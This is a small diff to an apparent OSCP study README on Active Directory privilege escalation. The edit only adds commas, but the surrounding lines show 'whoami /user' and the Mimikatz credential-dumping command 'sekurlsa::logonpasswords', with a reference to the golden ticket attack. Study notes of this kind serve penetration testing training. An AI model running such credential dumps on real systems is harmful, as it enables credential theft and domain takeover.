rahmiy/OSCPv.2/windows+AD privesc/AD/README.md

 ```
 whoami /user
 ```
-Next dump the hash as before like the golden ticket attack:
+Next, dump the hash as before, like the golden ticket attack:

 ```
 sekurlsa::logonpasswords